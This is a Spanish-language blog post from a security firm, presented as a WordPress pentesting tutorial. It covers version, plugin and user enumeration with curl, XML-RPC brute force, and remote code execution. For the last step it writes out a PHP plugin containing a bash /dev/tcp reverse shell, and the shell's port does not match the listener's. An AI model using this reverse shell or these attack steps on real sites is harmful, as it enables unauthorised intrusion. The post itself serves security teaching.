¡Hola a todos! Hoy vamos a meternos en el mundo de WordPress con este nuevo post «Hacking WordPress – Guía de explotación básica», pero desde una perspectiva un poco diferente. No, no vamos a hablar sobre cómo crear el blog de tus sueños o la página de tu negocio online. Vamos a adentrarnos en el lado oscuro: cómo los pentesters le echan el guante a sitios hechos con WordPress. Pero oye, antes de que pienses mal, nuestro viaje es por una buena causa: aprender a protegernos.
Vamos a desmenuzar algunas técnicas que estos cibercacos usan para colarse en sitios como el tuyo y el mío. Hablaremos de cosas como inyecciones SQL que suenan a enfermedad pero que en realidad pueden enfermar tu sitio, de XSS (no, no es una talla extra pequeña), y de cómo un simple descuido en tu configuración puede ser la entrada VIP para estos intrusos.
Pero tranqui, que esto no es para asustarte, sino todo lo contrario. La idea es que, conociendo sus trucos, podamos blindar nuestros sitios y dormir un poco más tranquilos. Así que, si te pica la curiosidad sobre cómo mantener a raya a los malos de internet, quédate por aquí. ¡Vamos a hacer de nuestro WordPress una fortaleza!
¿Qué es WordPress?
¿Has soñado con tu espacio en internet? Ya sea un blog, tienda virtual o un sitio para tu negocio, WordPress es tu aliado digital para hacerlo realidad. Imagina WordPress como un kit digital de construcción, lleno de ‘plugins’ y ‘temas’ que te permiten crear el sitio web perfecto sin ser experto en informática.
Desde su inicio en 2003, WordPress ha crecido hasta potenciar más del 40% de los sitios web, desde blogs personales hasta corporativos. Pero, su popularidad atrae a ciberdelincuentes que emplean tácticas como inyecciones SQL, ataques de fuerza bruta y XSS para vulnerar sitios. La defensa contra estos ataques depende de una comunidad global que desarrolla actualizaciones de seguridad y plugins.
WordPress ofrece la posibilidad de crear tu sitio web ideal, promoviendo al mismo tiempo la importancia de ser proactivo en la seguridad digital. Es una herramienta poderosa que, con el conocimiento adecuado, te permite ser el guardián de tu espacio en internet. Recuerda, mantenerse seguro es clave.
A continuación, vamos a ver algunas técnicas que podemos realizar durante nuestra auditoría de seguridad frente a WordPress.
1. Enumeración Pasiva
La enumeración pasiva, se basa principalmente en poder obtener información del sitio web de una manera no sospechosa, es decir, sin casi interactuar con la plataforma o lo más mínimo.
1.1 Obtener la versión de WordPress
Esto nos servirá para poder buscar vulnerabilidades conocidas e incluso sus exploits asociados.
1.1.1 Comprobación de archivos
Comprueba que los archivos «license.txt» o «readme.html» existen. Pueden obtener información importante sobre el sitio WordPress que estes auditando.
http://poc.wordpress.local/license.txt
http://poc.wordpress.local/readme.html
1.1.2 Comprobación del código fuente
La comprobación del código fuente, básicamente trata de buscar ciertas etiquetas, las cuales, a veces contienen la versión de WordPress, como por ejemplo:
- Content WordPress (No tan normal):
curl http://poc.wordpress.local/ | grep 'content=WordPress'- Meta Name:
curl http://poc.wordpress.local/ | grep 'meta name='
- CSS Link Files:
curl http://poc.wordpress.local/ | grep 'css?ver='
- JavaScript files:
curl http://poc.wordpress.local/ | grep 'js?ver='
1.2 Obtener plugins
Obtener que plugins tiene instalado el WordPress que estamos auditando, nos da la posibilidad de encontrar un plugin desactualizado y que tenga una vulnerabilidad pública. Este caso nos daría la posibilidad de explotarla y acceder.
curl -H 'Cache-Control: no-cache, no-store' -L -ik -s http://poc.wordpress.local/ | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
1.3 Obtener los temas utilizados
De la misma manera que pueden existir plugin vulnerables, pasa lo mismo con los temas, puede pasar que existan vulnerabilidades que podamos aprovechar en nuestras auditorías.
curl -s -X GET http://poc.wordpress.local/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
1.4 Obtener versiones en general
Esto nos ayudará para encontrar enlaces dentro del código fuente los cuales contengan información sobre versiones en general.
curl -H 'Cache-Control: no-cache, no-store' -L -ik -s http://poc.wordpress.local/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
2. Enumeración Activa
2.1 User ID Brute force
Esta técnica nos ayudará a encontrar los IDs que existen. En caso de lanzar la petición y recibir «status 200» o «status 300» quiere decir que el ID que hemos comprobado existe.
curl -s -I -X GET http://poc.wordpress.local/?author=12.2 Comprobación a través de REST API
La instalación de WordPress trae habilitado un REST API con el cual podemos interactuar, de esta manera podemos incluso llegar a obtener información:
- Obtener información de los usuarios:
curl http://poc.wordpress.local/index.php/wp-json/wp/v2/users- Recolectar información sobre un usuario. Para esto será necesario que el usuario haya realizado una publicación:
curl http://poc.wordpress.local/index.php/wp-json/oembed/1.0/embed?url=POST-URL- Obtener información sobre la dirección IP interna del servidor:
curl http://poc.wordpress.local/index.php/wp-json/wp/v2/pages3. XML-RPC
XML-RPC en WordPress es como un intérprete que permite a aplicaciones externas comunicarse con tu sitio. Imagina que quieres publicar en tu blog desde tu smartphone o interactuar con tu sitio WordPress a través de otra plataforma. XML-RPC hace esto posible, sirviendo como un puente para que otras aplicaciones envíen o reciban información de tu sitio WordPress, usando un lenguaje común: XML. Aunque ha sido crucial para facilitar la interacción remota, también ha atraído la atención de ciberdelincuentes, quienes lo ven como un posible punto de entrada para sus travesuras. Por eso, aunque es una herramienta poderosa, su uso debe ser manejado con cuidado para mantener la seguridad de tu sitio.
3.1 Comprobar que XML-RPC está habilitado
Para comprobar si el sitio que estamos auditando, tendremos que realizar la siguiente petición:
curl -s -I -X POST http://poc.wordpress.local/xmlrpc.phpEn caso de que la petición, nos devuelva como resultado un «200» status code, veremos que XML-RPC está habilitado en el sitio web.
3.2 Fuerza bruta
Para aprovechar en su máximo esplendor está funcionalidad, vamos a demostrar como podríamos obtener acceso mediante esta característica al sitio web con fuerza bruta. Cabe mencionar que también podríamos realizar un ataque DoS. Para este ejemplo, vamos a utilizar la herramienta automatizada:
Vamos a clonar el respositorio de la herramienta y entonces vamos a lanzar el siguiente comando, el cual nos permitirá ejecutar la herramienta e iniciar el proceso de bruta fuerza contra el sitio web que aloja WordPress:
python3 exploit.py http://poc.wordpress.local/ 5 15
Una vez que hemos proporcionado el usuario y el diccionario que deseamos utilizar, la herramienta hará el resto, proporcionando la contraseña del usuario en caso de que el diccionario que estamos utilizando la contenga.
4. Remote Code Execution
Para esta parte, nos vamos a centrar principalmente en la instalación de un plugin con «sorpresa». Esto lo vamos a realizar subiendo una reverse shell en php a la instalación de WordPress una vez hayamos conseguido acceso.
4.1 Instalación de Plugin WordPress con Reverse Shell
La reverse shell que vamos a utilizar, será, la bien conocida:
<?php
/**
* Plugin Name: Reverse Shell Plugin
* Plugin URI:
* Description: Reverse Shell Plugin
* Version: 1.0
* Author: Vince Matteo
* Author URI: http://www.sevenlayers.com
*/
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.86.99/443 0>&1'");
?>Una vez tengamos descargado el código PHP, lo que realizaremos en primera instancia, será, reemplazar la siguiente configuración en relación a la IP de escucha y puerto:
El siguiente paso, será, establecer nuestro servidor de escucha con netcat:
sudo nc -nlvp 4444
Ahora, a través del panel de administración de WordPess, desde la sección de «Plugins» vamos a subir la reverse shell en formato ZIP:
Al subir nuestra reverse shell, podemos instalar el «Plugin»:
Cuando tengamos el plugin instalado, veremos el mensaje «Plugin instalado correctamente», donde pulsaremos en activar plugin:
Una vez activado, recibiremos nuestra reverse shell:
5. Vídeo
🛸Coming soon 🛸
6. Conclusión
En este recorrido por WordPress, hemos desglosado desde la funcionalidad clave de XML-RPC hasta las estrategias para fortificar nuestros sitios frente a amenazas cibernéticas. La conclusión es clara: la gestión de un sitio WordPress requiere una vigilancia técnica constante y una implementación proactiva de medidas de seguridad.
Recordemos, mantener un sitio WordPress optimizado y seguro va más allá de simples actualizaciones; implica una comprensión técnica de los potenciales vectores de ataque y la aplicación de prácticas avanzadas de seguridad, como la minimización de permisos, la autenticación de dos factores y el escaneo regular de vulnerabilidades.
Así, mientras WordPress ofrece una plataforma robusta y flexible para el desarrollo web, su seguridad depende en gran medida de nuestro compromiso y conocimiento técnico. Adelante, entonces, con la tarea de asegurar nuestros sitios, aplicando lo último en tecnología de seguridad para mantenerlos no solo funcionales, sino también blindados contra las amenazas más sofisticadas del ciberespacio.
🔒 Hardsoft Security ofrece servicios de consultoría en ciberseguridad, asegurando que tu negocio esté siempre protegido contra las amenazas más recientes. Y si estás buscando un alojamiento que ponga la seguridad primero, Secure Hosting es tu solución ideal. Ayudamos a mantener seguro tu sitio web con las mejores prácicas de ciberseguridad con nuestro asesoramiento en ciberseguridad especializado.
No esperes a ser el próximo objetivo. Asegura tu presencia online con las mejores soluciones y servicios del mercado. ¡Contacta con Hardsoft Security y Secure Hosting hoy mismo!